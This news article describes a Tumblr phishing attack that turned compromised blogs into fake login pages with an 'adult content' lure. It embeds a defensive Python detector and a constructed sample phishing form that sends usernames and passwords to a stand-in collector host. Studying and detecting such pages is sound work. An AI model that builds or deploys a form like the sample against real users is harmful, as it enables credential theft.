Thousands of logins for emo-blogging platform Tumblr have been stolen in the past week via a phishing attack that lured users to enter their credentials in exchange for the promise of erotic content.
Compromised Tumblr sites were converted into pages that mimicked the Tumblr login screen, with the added message “This page contains adult content. Please revalidate your credentials.” If you entered your Tumblr login, your own page would be converted into another fake login screen and the cycle would continue.
The phish attack then spread by having that Tumblr user “follow” several other new Tumblr users. When those people then got notified that they had new followers, they would click on those people’s names in their dashboard to see who they were. That’s when the fake login would pop up.
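The two tells in the mechanism above, a password form served from a user-content blog page and credentials posted somewhere other than the platform's own login host, can be checked mechanically. The following is an added example for defenders, not code from the original post or from Tumblr; the official login host, the blog hostname and the sample page are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse, urljoin

OFFICIAL_LOGIN_HOST = "www.tumblr.com"  # assumption: the only host that should see credentials
BAIT_PHRASES = ("revalidate your credentials", "contains adult content")

class _FormScanner(HTMLParser):
    """Collect (action, has_password_field) per form plus the page's visible text."""
    def __init__(self):
        super().__init__()
        self.forms, self.text = [], []
        self._action, self._has_pw = None, False
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._action, self._has_pw = a.get("action", ""), False
        elif tag == "input" and a.get("type", "").lower() == "password":
            self._has_pw = True
    def handle_endtag(self, tag):
        if tag == "form" and self._action is not None:
            self.forms.append((self._action, self._has_pw))
            self._action = None
    def handle_data(self, data):
        self.text.append(data.lower())

def phish_indicators(page_url, html):
    """Return indicator strings for the Tumblr-style login phish; [] if nothing is suspicious."""
    host = urlparse(page_url).hostname or ""
    scanner = _FormScanner()
    scanner.feed(html)
    found = []
    for action, has_pw in scanner.forms:
        if not has_pw:
            continue  # a search box or comment form is not a credential form
        target = urlparse(urljoin(page_url, action)).hostname or ""
        if host != OFFICIAL_LOGIN_HOST:   # login prompt rendered on a user-content blog page
            found.append(f"password form on user-content host {host}")
        if target != OFFICIAL_LOGIN_HOST: # credentials would leave the platform entirely
            found.append(f"credentials posted to {target}")
    text = " ".join(scanner.text)
    found += [f"bait phrase: {p!r}" for p in BAIT_PHRASES if p in text]
    return found

# Constructed sample imitating the page described in the article (not the real kit).
SAMPLE_PHISH = """<html><body><p>This page contains adult content. Please
revalidate your credentials.</p><form action="http://collector.example/grab"
method="post"><input name="email"><input type="password" name="pw"></form>
</body></html>"""
```

Running `phish_indicators("http://victim.tumblr.com/", SAMPLE_PHISH)` returns all four indicators, while the same check on a password form at the official login host with a same-site action returns an empty list.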
Once you get past the initial surprise, the question is: what would anyone want with a bunch of Tumblr usernames and passwords? The service is free, so you’re not going to get anyone’s credit card, banking, or personal information. The attack could have been a precursor to setting up a link farm, or maybe the perpetrator simply wanted a proof of concept of how gullible Tumblr users were.
Tumblr has been restoring the sites of the users who were compromised and says it is tracking down the source of the attack.
Here are various Tumblr posts from users about the attack: http://www.tumblr.com/tagged/adult+content
Thousands of Tumblr Logins Stolen in Phishing Attack [GFI Labs Blog]